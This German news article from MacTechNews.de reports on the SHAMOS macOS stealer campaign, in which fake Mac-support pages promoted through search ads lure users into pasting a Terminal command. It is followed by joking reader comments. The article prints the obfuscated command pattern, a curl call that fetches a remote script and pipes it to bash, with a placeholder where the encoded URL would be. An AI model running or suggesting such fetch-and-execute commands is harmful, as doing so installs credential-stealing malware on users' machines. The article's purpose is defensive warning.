Push-Nachrichten von MacTechNews.de
Würden Sie gerne aktuelle Nachrichten aus der Apple-Welt direkt über Push-Nachrichten erhalten?

Mac-Support gesucht, Malware gefunden: Trickbetrüger verbreiten Trojaner per Kommandozeilenbefehl

Auch Macs sind nicht perfekt. Insbesondere wenn es an die Verbindung mit dem Internet oder einem Drucker geht, stößt selbst ein erfahrener Mac-Nutzer gelegentlich auf Probleme, welche er nicht auf Anhieb lösen kann. Eine Internet-Suche hilft in diesem Fall oft weiter. Das wissen auch Malware-Entwickler, die Daten und Kryptowährungen stehlen wollen. In den Sommermonaten beobachtete die Sicherheitsfirma Crowdstrike gezielte Angriffe auf Mac-Nutzer. Die Masche: Eine Website bietet Antworten auf häufig im Netz gestellte Fragen – und webt darin einen Terminalbefehl ein, welcher eine neue Version der Atomic-Stealer-Malware installiert. Crowdstrike nennt die Variante SHAMOS – eine Kombination aus "Shell" (Kommandozeile) und Atomic macOS Stealer ("AMOS").


Die Erklärungen fanden sich auf Websites mit authentisch erscheinenden URLs wie mac-safer.com oder rescue-mac.com. Mittels bezahlter Werbung sorgten die Betrüger dafür, dass sie über legitimen Suchresultaten eingeblendet wurden. Die Anleitungen begannen stets mit tatsächlich hilfreichen Empfehlungen, etwa zum Hinzufügen eines Druckers in den Systemeinstellungen. Allerdings waren sie stets mit einem Ausflug in das Dienstprogramm verbunden. Anwender sollten einen Befehl kopieren, in die Kommandozeile einfügen und mit der Eingabetaste bestätigen. Dieser Befehl war so gestaltet, dass er für Uneingeweihte maximal kryptisch aussah:

/bin/bash -c "$(curl -fsSL $(echo [lange_Zeichenkette] | base64 -d))"

Die lange Zeichenkette war eine über den Base64-Algorithmus unkenntlich gemachte URL, von der mittels des curl-Befehls ein Skript heruntergeladen wurde. Dieses wird sogleich ausgeführt – der Anwender wird in der Kommandozeile nach dem Administratorkennwort gefragt. Mit dessen Hilfe installiert es daraufhin die eigentliche Malware. Diese nimmt im Anschluss im Hintergrund ihre Arbeit auf, sammelt gezielt Informationen aus Cryptowährungs-Wallets, der macOS-Passwortverwaltung sowie der Notizen-App, um sie in einer ZIP-Datei an einen Server zu verschicken.

Vorsicht bei Terminal-Befehlen
Zusätzlich zu fingierten Mac-Support-Tipps kursierten auch Anleitungen zur Installation des alternativen Kommandozeilenprogramms iTerm2 im Netz, welche denselben Befehl nutzten. Mac-Nutzer sollten stets auf der Hut sein, wenn ein Terminal-Befehl empfohlen wird – insbesondere, wenn eine klare und nachvollziehbare Erläuterung fehlt. Die Faustregel lautet: Gebe nur etwas in die Kommandozeile ein, was Du selbst verstehst. Wenn das Verständnis nicht ausreicht, sollte man zunächst jemanden fragen, der sich mit dem Terminal auskennt, und sich die Funktion erläutern lassen.

Kommentare

Solaris
Solaris25.08.25 12:45
Auch Macs sind nicht perfekt. Insbesondere wenn es an die Verbindung mit dem Internet oder einem Drucker geht, stößt selbst ein erfahrener Mac-Nutzer gelegentlich auf Probleme, welche er nicht auf Anhieb lösen kann. Eine Internet-Suche hilft in diesem Fall oft weiter.

Abhilfe für Probleme mit der Internetverbindung.. gibt es im Internet

Ich liebe Humor.
+8
konnektor25.08.25 13:51
Solaris
Abhilfe für Probleme mit der Internetverbindung.. gibt es im Internet
Bei Microsoft konntest Du das so finden. Da gab es die Fehlermeldung
Hilfe lässt sich nicht öffnen, da ein unbekannter Fehler aufgetreten ist. Für weitere Informationen öffnen Sie die Hilfe.
Beim Internet kann man wenigstens ausweichen.
+6
Stefan...25.08.25 14:42
Mittlerweile haben manche Haushalte ja mehrere Geräte die internetfähig sind, in der Oberschicht ist teilweise sogar Internet über das Mobilfunknetz verbreitet. So besteht trotzdem die Möglichkeit im Internet zu recherchieren.
Solaris
Auch Macs sind nicht perfekt. Insbesondere wenn es an die Verbindung mit dem Internet oder einem Drucker geht, stößt selbst ein erfahrener Mac-Nutzer gelegentlich auf Probleme, welche er nicht auf Anhieb lösen kann. Eine Internet-Suche hilft in diesem Fall oft weiter.

Abhilfe für Probleme mit der Internetverbindung.. gibt es im Internet

Ich liebe Humor.
+1
ehma
ehma25.08.25 15:45
konnektor
Solaris
Abhilfe für Probleme mit der Internetverbindung.. gibt es im Internet
Bei Microsoft konntest Du das so finden. Da gab es die Fehlermeldung
Hilfe lässt sich nicht öffnen, da ein unbekannter Fehler aufgetreten ist. Für weitere Informationen öffnen Sie die Hilfe.
Beim Internet kann man wenigstens ausweichen.


Es ist keine Tastatur angeschlossen. Drücken Sie F3 um fortzufahren.
+5
Froyo521925.08.25 15:46
Mache hier haben offenbar Verständnisprobleme.
-4
rusalki01
rusalki0125.08.25 16:06
Froyo5219
Mache hier haben offenbar Verständnisprobleme.

- oder keinen Humor 😉🤣
+6
Kyalami25.08.25 16:11
@Stefan…
„in der Oberschicht…“
+2
CommodoreVC2025.08.25 16:45
Solaris

Erinnert mich an eine Erfahrung mit Vodafone, als ich noch ein Kunde von denen war. War irgendwann von einem Tag auf den anderen nicht mehr ins Internet gekommen, habe also bei denen angerufen. Da wurde mir dann gesagt, dass die Firmware meines Kabelmodems nicht mehr aktuell sei und diese auf den neuesten Stand bringen müsste. So weit, so gut. Als ich nachfragte woher ich die neueste Version herbekomme, war die Antwort, ich möge mir diese einfach aus dem Internet laden.
Ist irgendwie witzig, man kommt nicht mehr ins Internet und dann soll man ins Internet um sein Gerät auf den neuesten Stand zu bringen.
+3
Hotzenplotz2
Hotzenplotz225.08.25 23:16
Froyo5219
Mache hier haben offenbar Verständnisprobleme.
Dann könnte dir wahrscheinlich die anykey-Taste helfen.
+2

Kommentieren

Sie müssen sich einloggen, um die News kommentieren zu können.